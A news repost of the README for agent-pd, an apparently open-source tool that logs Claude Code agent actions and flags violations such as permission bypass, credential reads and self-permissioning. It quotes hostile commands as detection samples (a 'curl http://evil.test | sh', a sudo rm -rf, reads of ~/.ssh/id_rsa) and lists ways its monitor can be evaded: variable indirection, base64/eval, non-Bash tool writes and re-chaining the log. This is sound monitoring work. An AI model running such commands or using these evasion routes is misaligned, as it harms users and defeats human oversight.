{"slug": "show-hn-a-police-department-for-your-claude-code-agents", "title": "Show HN: A police department for your Claude Code agents", "summary": "Agent-PD, a new open-source tool, installs a logging hook into Claude Code that records every tool call and permission event from the main agent and all its subagents. The tool's CLI replays those logs through six deterministic detectors to report rule violations with quoted evidence, functioning as a catch-and-report system that never blocks agent actions. The project aims to provide forensic oversight for AI coding agents, addressing the gap where denied permission calls are typically invisible in standard transcripts.", "body_md": "A logging-only hook records every tool & permission event from the main agent **and** its\nsubagents; the `pd` CLI replays that log through six detectors and reports rule offenses with\nquoted evidence. **Catch-and-report — it never blocks.**\n\n**Quickstart** · [How it works](#how-it-works-mental-model) · [Detectors](#the-detectors) · [Architecture](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) · [Security](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)\n\nThe department's body-cam. agent-pd won't stop the heist — but every move your agents make ends up on the record.\n\nFlight recorder + police scanner, not a firewall. If you need to stop an action, that stays with Claude Code's permission prompts or an OS sandbox. 
agent-pd tells you what an agent did — faithfully, after the fact or live as it happens.\n\n**Highlights**\n\n- **Covers the main agent + every subagent**, including those spawned by Claude Code's new dynamic **Workflow** tool (verified against recorded `workflow-subagent` hook events).\n- **Six deterministic detectors** at **zero token cost** — denied calls, out-of-scope & credential access, permission bypass, self-permissioning, disallowed tools, off-task work.\n- **Tamper-evident audit log** (hash-chained) with an optional **off-host append-only sink**.\n- **Sessions are named, not UUIDs** — `pd list` and `pd watch` show each session's project directory and first user prompt, derived from data already in the logs (works retroactively).\n- **Honest by design** — it raises the bar; it is **not** a sandbox. See [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md).\n\n**What it looks like** — `pd watch --all` across three concurrent sessions (three projects,\nmain agents + subagents with their briefs, two genuine flags and one borderline search among\nthe ordinary work):\n\nEvery screenshot in this README is a real Terminal capture of the real engine replaying a seeded three-session fleet — reproduce them yourself with `examples/demo-sessions.sh`.\n\nClaude Code agents can read files, run shell commands, and spawn subagents. Most of that is\nfine — but you usually find out what an agent *actually did* only by scrolling a transcript,\nand **denied calls never reach the transcript at all** (Claude Code kills them first). 
agent-pd\ninstalls a hook that records every event to a per-session audit log, then gives you tools to\nask: *did any agent go out of scope, touch credentials, try to escalate, edit its own config,\nuse a tool it wasn't allowed, or wander off its brief?*\n\n```\n SETUP              CAPTURE (automatic, every session)        READ (per session or --all)\n pd install-hook  →  hook fires on every tool call        →   pd report   (forensic)\n      │                    │                                   pd watch    (live scanner)\n settings.json       ~/.claude/pd/audit/<session>.jsonl        pd judge    (opt-in LLM pass)\n```\n\nFor the full picture — system context, component, sequence, detector-pipeline, and integrity diagrams (with rendered images) — see [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md).\n\n- **The hook is a dumb, crash-safe recorder.** Registered globally in `~/.claude/settings.json` on PostToolUse / PermissionDenied / SubagentStart / SubagentStop. On each event it appends one normalized, hash-chained line to a **per-session** audit file and **always exits 0** — it never blocks, never loses an event, records all sessions concurrently.\n- **All the intelligence is in the reader.** `pd report` / `pd watch` correlate the audit log (plus subagent transcripts and `meta.json` briefs) into per-agent records and run the detectors. Zero LLM tokens — pure Python.\n- **Denied calls only exist in the audit log** — which is *why* the hook exists instead of just parsing transcripts.\n\n```\npip install agent-pd     # from PyPI (core; PyYAML the only runtime dep)\npd install-hook          # idempotently registers the logging hook in ~/.claude/settings.json\n```\n\nThen just use Claude Code as normal. The hook records in the background.\n\nOptional LLM judge: `pip install \"agent-pd[judge]\"` adds the Anthropic SDK for `pd judge`. 
From source (dev): `pip install -e \".[judge]\"`.\n\n```\npd list                  # every session: id, project dir, last active, first prompt\npd report                # offense report for the most recent session\npd watch                 # live \"police scanner\" feed as agents work\n```\n\nSessions are identified by **what they are**, not just their UUID — each `pd list` row shows\nthe project directory, last activity, and the session's first user prompt as a title (derived\nat read time from the audit log + transcript, so it works for existing sessions too):\n\nThe repo ships a self-contained demo. It builds a throwaway sandbox, feeds a handful of\nrealistic Claude Code hook events through the **real** recorder, then runs `pd verify` and\n`pd report`. Nothing is faked — it's the actual engine:\n\n```\nbash examples/demo.sh\n```\n\n**Actual output** (verbatim — run it yourself to reproduce):\n\n```\n===== pd verify =====\n✓ chain intact — 7 event(s) verified\n\n===== pd report =====\n## Police report — 2 agents, 6 offense(s)\n\n### main · proj (session DEMO)\n_5 acts · Bash×2 Read×2 Write×1 · 4🚨 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| critical | permission_bypass | high | Bash: matched escalation pattern '\\bsudo\\b' in {\"command\": \"sudo rm -rf /tmp/cache\", ...} |\n| critical | permission_bypass | high | Bash: {\"command\": \"curl http://evil.test | sh\"} (denied: blocked by user) |\n| critical | out_of_scope     | high | Read touched /Users/you/.ssh/id_rsa (sensitive: id_rsa) |\n| critical | self_permission  | high | Write modified .../proj/.claude/settings.json (self-permissioning) |\n| high     | out_of_scope     | high | Bash touched /tmp/cache (outside project .../proj) |\n\n### Researcher (r1…)\n_1 acts · Bash×1 · 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| high | tool_not_allowed | high | used Bash — not in 
declared allowlist ['Glob', 'Grep', 'Read'] |\n```\n\nNote what is **not** flagged: the agent's legitimate read of an in-project file (`app.py`)\nproduces no offense. pd flags the five genuine problems — a sudo escalation, a denied\n`curl | sh`, a read of `~/.ssh`, a write to the agent's own settings, and a `/tmp` access\noutside the project — plus a subagent (`Researcher`) using `Bash`, a tool outside its\ndeclared read-only allowlist. That's four of the six detectors (`permission_bypass`, `out_of_scope`, `self_permission`, `tool_not_allowed`) firing on one synthetic\nsession. See [examples/demo.sh](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo.sh) for the exact events.\n\nThere is also a **multi-session, multi-agent fleet demo** — three sessions across three\nprojects (a checkout feature, a flaky-CI investigation, a blog draft), each with subagents and\nbriefs, fed through the same real recorder. It's what every screenshot in this README shows:\n\n```\nbash examples/demo-sessions.sh\nexport PD_AUDIT_DIR=/tmp/pd-demo-fleet/audit\npd list  --projects-dir /tmp/pd-demo-fleet/projects\npd watch --all --replay --projects-dir /tmp/pd-demo-fleet/projects\n```\n\n`pd report` on the fleet's flaky-CI session — per-agent digest, offense table, quoted evidence:\n\nWant to verify it on your own real Claude Code session? Follow the safe ~15-minute hands-on walkthrough in `docs/manual-tests/TRY-IT-LIVE.md`.\n\n```\npd install-hook                       # register the logging hook (one-time)\npd list                               # every session: id · project · last active · “first prompt”\n\npd report                             # offense report, most recent session\npd report --session <id> --format md  # md | json | both\npd report --verbose                   # full evidence + files-touched per agent\npd report --agent <id|main>           # focus one agent: digest + every action it took\n\npd watch                              # live feed, most recent session — streams NEW activity\n                                      #   from now (like tail -f); existing backlog is skipped\npd watch --replay                     # replay the whole session's backlog first, then tail\npd watch --all                        # merged feed across ALL sessions (§session tag; an intro\n                                      #   line names each session's project + first prompt)\npd watch --crimes-only                # quiet unless something's wrong\npd watch --verbose                    # full commands + reasons, no truncation\npd watch --session <id> --no-color --no-emoji   # plain terminals / SSH\n\npd verify                             # check the audit-log hash-chain (most recent session)\npd verify --all                       # verify every session; exit 2 on tamper/truncation\n                                      # set PD_AUDIT_KEY for HMAC-keyed integrity\n\npd judge                              # dry run (free): items / agents / ≈token estimate\npd judge --run --via-claude-code      # confirm off_task flags on your Claude subscription\npd judge --run --model sonnet --max 20    # or via the metered Anthropic API\n\npd compact [--session ID] [--prune-older-than DAYS] [--dry-run]\n                                      # gzip old logs (<sid>.jsonl -> .jsonl.gz); skips the active\n                                      # session; lossless for detection. Optional age-based prune.\n\npd sink push [--session ID] [--all]   # forward un-sent chained events off-host (append-only sink)\npd sink status [--session ID] [--all] # forwarded/last per session; flags \"remote ahead\"\n```\n\nSix deterministic detectors (zero tokens) plus one opt-in LLM pass.\n\n| Offense | Severity | What it catches | Confidence |\n|---|---|---|---|\n| `permission_bypass` | critical | Denied calls + a two-tier Bash scan: never-downgrade catastrophic (`rm -rf /`, fork bomb, `curl\\|sh`, `dd of=/dev/…`) stay critical under any allow-rule; downgradable escalation (sudo, `chmod 777`, cwd-wipe) only by a precise rule. | high |\n| `out_of_scope` | high / critical | File or Bash path outside the project (auto: git root or cwd), or outside configured `scope_dirs`. Sensitive paths (`~/.ssh`, `~/.aws`, `~/.claude`, `/etc/shadow`, shell history…) are always critical and never downgraded. | high |\n| `self_permission` | critical | Any agent write to its own control files (`.claude/settings*.json`, `.claude/agents/*.md`, `pd-rules*.yaml`) via any method — Write/Edit/NotebookEdit or Bash `cp`/`mv`/`tee`/`sed`/`python`/`base64`/redirect — regardless of content. | high |\n| `tool_not_allowed` | high | A subagent uses a tool outside its declared `tools:` allowlist (`.claude/agents/<type>.md`). | high |\n| `redundant` | low | Exact-duplicate tool calls (ignores Bash `description` noise). | high |\n| `off_task` | review | Search/query terms vs. the agent's brief, by word-overlap below a threshold. | low — heuristic |\n\nThe five high-confidence detectors are trustworthy and free. `off_task` is intentionally noisy\nand hard-labeled low-confidence — the **judge** (below) turns it into high-confidence verdicts.\n\n`out_of_scope` and escalation hits are **downgraded to a quiet info severity** when the action\nmatches a permission **allow-rule** you configured (`permissions.allow` in `~/.claude/settings.json` or project `.claude/settings.local.json`) — *authorized → info, unauthorized → full severity*.\n\nMatching is **faithful to Claude Code's own semantics**: shell-operator splitting (a `Bash(git:*)` rule does **not** license `git status && rm -rf ~`), command-substitution / backtick extraction,\nredirect targets as a separate authorization, word-boundary prefixes (`npm install:*` ≠\n`npm installmalware`), and gitignore-style globs. Ambiguity resolves **conservatively → not\npermitted** (under-flagging is worse than over-flagging). Two things are **never** downgraded:\nsensitive-path access and categorically-catastrophic commands. 
A denied call stays critical\nregardless — a denial is unpermitted by definition.\n\n`pd judge` is an optional LLM pass that reads each agent's brief and its flagged searches, then confirms or\ndrops the noisy `off_task` flags. Built to cost almost nothing:\n\n- **Opt-in** — never runs in the hook or `pd watch`.\n- **Dry-run by default** — prints an estimate; add `--run` to actually call.\n- **Pre-filtered + batched** — only already-flagged items, one API call per agent.\n- **Two backends:** `--via-claude-code` shells out to the headless `claude` CLI (**your Claude subscription, no API key**), or the metered Anthropic API (`pip install -e \".[judge]\"` + `ANTHROPIC_API_KEY`).\n- `--model haiku|sonnet|opus` (default haiku), `--max N`.\n\nIn the demo fleet, the orders-api subagent rabbit-holed into a CI-infra search with zero word-overlap against its brief — the heuristic flags it for review, and the dry run prices out exactly what confirming it would cost:\n\n`pd watch` is a real-time feed of what your agents are doing and which rules they're breaking. The header\n**names the session it attached to** — project directory plus the session's first prompt — so\nattaching to the default (most recent) session is never a mystery:\n\nEach agent gets a stable color and a banner with its assigned brief; every action is a feed\nline with a severity badge; a live rap-sheet footer tallies crimes per agent. With `--all`\n(merged feed across every session) the first time a session appears it prints a\n`§sid · project · “title”` intro line, so interleaved sessions stay distinguishable — see the\nfleet screenshot at the top of this README.\n\n`--crimes-only` keeps the feed quiet unless something is actually wrong — only flagged actions\nstream — and Ctrl-C prints a final **rap sheet** tallying every agent in every session:\n\nZero extra dependencies — ANSI only. 
The full annotated\nscreenshot set lives in [docs/test-evidence.md](https://github.com/varmabudharaju/agent-pd/blob/master/docs/test-evidence.md).\n\nEvery event carries a `seq` and a `chain = sha256(prev_chain + canonical(event))` (HMAC-SHA256\nif `PD_AUDIT_KEY` is set), computed by the hook under a per-session file lock with a\n`<sid>.head.json` anchor. **`pd verify`** recomputes the chain and reports `✓ intact`,\n`✗ TAMPER DETECTED`, or `✗ TRUNCATED` (exit 2), and holds across `pd compact`. Here it is\ncatching both attacks for real — one event deleted from a log's tail, then one byte flipped\ninside a recorded command (the compacted session still verifies):\n\nThis is tamper-**evident**, not tamper-**proof**: a same-user agent with Bash can re-chain the\nwhole file. To close the *retroactive-deletion* half of that gap, **`pd sink push`** forwards each\nchained event to an **off-host, append-only destination** (file or http backend; env-only `PD_SINK_TOKEN`; `https://` enforced for remote tokens; redirects not followed). Once an event has\nshipped off-host, a later local rewrite can't reach it. **`pd sink status` flags \"remote ahead\" when more events shipped than remain locally — a truncation signal:**\n\nAppend-only is a deployment requirement pd can't enforce, and the sink does not stop a same-user agent from forging entries or disabling the hook. Read [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md) for the full, honest framing before relying on any of this.\n\nagent-pd **raises the bar; it is not a sandbox.** A determined same-privilege adversary using\nobfuscation or indirection can evade static detection. 
Known limits, in plain terms:\n\n- **Obfuscation / indirection evades static detection.** Multi-level `$VAR` chains (`A=/etc/shadow; B=$A; cat $B` — only single-level expansion is followed), `$IFS` / word-split tricks, two-step download-then-exec (`curl -o f url; sh f`), base64/eval-assembled commands, and dynamically-built paths can slip past.\n- **Non-Bash file-write MCP tools bypass `self_permission`.** Only Write/Edit/NotebookEdit and Bash are inspected for control-file writes; a filesystem MCP tool with a different shape could write `.claude/settings.json` undetected.\n- **`off_task` is heuristic** (word-overlap) and can't run on the main agent or on Workflow subagents (no brief). `pd judge` is the trustworthy path.\n- **`~/.config` sensitivity is broad** and can be noisy (it holds innocuous app config too).\n- **Tool *results* aren't surfaced** — the hook captures `tool_input` and an outcome flag, not full `tool_response`, to keep the audit log from bloating. The feed shows what an agent *did*, not its output.\n- **Audit integrity is tamper-evident, not tamper-proof** (above), and the off-host sink's append-only guarantee is the operator's responsibility.\n- **Symlink resolution is best-effort** (the symlink must exist at analysis time).\n- **Sessions that predate the hook** (transcript-only, no `<sid>.jsonl`) don't appear in `pd report`.\n\nThe full ledger of shipped / residual / declined items lives in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\nPrioritized, none blocking — scoped so any one can be picked up independently:\n\n- **Tool-agnostic control-file detection** — flag *any* tool whose input names a control path in a write-shaped field (closes the MCP `self_permission` gap).\n- **Multi-level `$VAR` resolution** — iterate variable substitution to a fixed point so 2-hop indirection (`B=$A`) no longer hides a sensitive path.\n- **Truncate / cap `tool_result`** at capture to keep raw `.jsonl` small.\n- **Narrow `~/.config` sensitivity** to credential-bearing subpaths (`gh`, `gcloud`, …) to cut noise.\n- **Sink enhancements** — chunk large backlogs, a syslog backend, and `pd verify --against-sink` read-back reconciliation.\n- **`pd summary <session>`** — per-agent digest (files touched, time span, tool histogram).\n- **Judge verdict disk cache** — skip re-judging identical (brief, search) pairs.\n- **Capture more hook events** (`PostToolUseFailure`, `PreCompact`, `SessionEnd`) to enrich timelines.\n\nagent-pd works out of the box with no config — every rule (sensitive paths, escalation\npatterns, severities, the `off_task` threshold) ships as a built-in default. A `pd-rules.yaml`\nfile is **optional**, and only needed to override those defaults.\n\nWhen you do write one, every command **auto-discovers** it — no flag required. On each run `pd`\nlooks for `pd-rules.yaml` in this order and uses the first it finds, deep-merged over the\nbuilt-in defaults:\n\n- the current directory\n- the enclosing **project root** (the git root above the cwd)\n- `~/.claude/pd-rules.yaml` (a global default for all projects)\n\nPrecedence is **`--rules <path>` › auto-discovered file › built-in defaults** — pass `--rules` on any command (including `pd watch`) to point at a specific file and override discovery. 
See\n`pd-rules.yaml` in this repo for every supported key (`scope_dirs`, sensitive paths, the two\nescalation tiers, severities, `off_task_overlap_threshold`, `storage`, and a `sink` section).\n\nLists in `pd-rules.yaml` replace the corresponding default list (deep-merge replaces lists rather than appending to them) — so if you set `sensitive_patterns`, include the built-ins you still want.\n\nThe off-host sink also reads env overrides: `PD_SINK_TYPE=file|http`, `PD_SINK_PATH` /\n`PD_SINK_URL`, `PD_SINK_TIMEOUT`, and the **env-only** `PD_SINK_TOKEN` (ignored if placed in a\nconfig file, so it never lands in a checked-in or world-readable file).\n\n```\n~/.claude/pd/audit/<sid>.jsonl      # live capture (hook appends here)\n~/.claude/pd/audit/<sid>.jsonl.gz   # compacted (pd compact, gzip)\n```\n\nThe audit log stores **full tool inputs** — file contents and Bash commands — which **may include\nsecrets in plaintext**. It lives **outside your repo** (won't be committed by accident) but treat\nit like any sensitive local file. `pd compact` gzips; it does **not** encrypt. Nothing is uploaded\nunless you configure a sink. To clear it: `rm ~/.claude/pd/audit/*.jsonl` (it repopulates as\nsessions run).\n\n**Choosing where logs go.** The default is deliberately a hidden, local, non-repo path. To put\nlogs somewhere you choose, set `PD_AUDIT_DIR`, or bake it into the hook at install time:\n\n```\npd install-hook --audit-dir ~/agent-pd-logs   # hook + CLI both use this path\n# or, per shell: export PD_AUDIT_DIR=~/agent-pd-logs\n```\n\nBoth the hook (writes) and every `pd` command (reads) honor `PD_AUDIT_DIR` (precedence:\n`--audit-dir` flag › `PD_AUDIT_DIR` › default). 
A **relative** path is resolved to an absolute\none when it's set (the install flag bakes the absolute path; `PD_AUDIT_DIR` is absolutized when\nread), so logs always land in one fixed place instead of scattering into whatever directory each\nagent happens to run in. Still, **don't** point it at a repo folder or a cloud-synced directory\n(iCloud/Dropbox) unless you accept that plaintext tool inputs — possibly secrets — will be\ncommitted or synced off-machine.\n\n```\npip install --user -e .          # core\npip install --user -e \".[judge]\" # + anthropic SDK (only for the API judge backend)\npython3 -m pytest -q             # 474 tests, pure (no API key needed)\n```\n\nTDD throughout; detectors, render, live, and judge are all unit-tested with no network. For the\ndesign in depth: [SYSTEM-DESIGN.md](https://github.com/varmabudharaju/agent-pd/blob/master/SYSTEM-DESIGN.md) (formal design doc — goals, components,\npermission model, trade-offs) and [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) (diagrams). Honest\nlimitations and roadmap live in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\n[Apache License 2.0](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE) © Sai Ram Varma Budharaju. Free to use, modify, and distribute (including\ncommercially); retain the copyright and license notice. 
Includes a patent grant.", "url": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents", "canonical_source": "https://github.com/varmabudharaju/agent-pd/blob/master/README.md", "published_at": "2026-06-11 17:47:39+00:00", "updated_at": "2026-06-11 19:23:29.774195+00:00", "lang": "en", "topics": ["ai-agents", "ai-tools", "ai-safety", "ai-products", "ai-infrastructure"], "entities": ["Claude Code", "agent-pd", "varmabudharaju"], "alternates": {"html": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents", "markdown": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents.md", "text": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents.txt", "jsonld": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents.jsonld"}}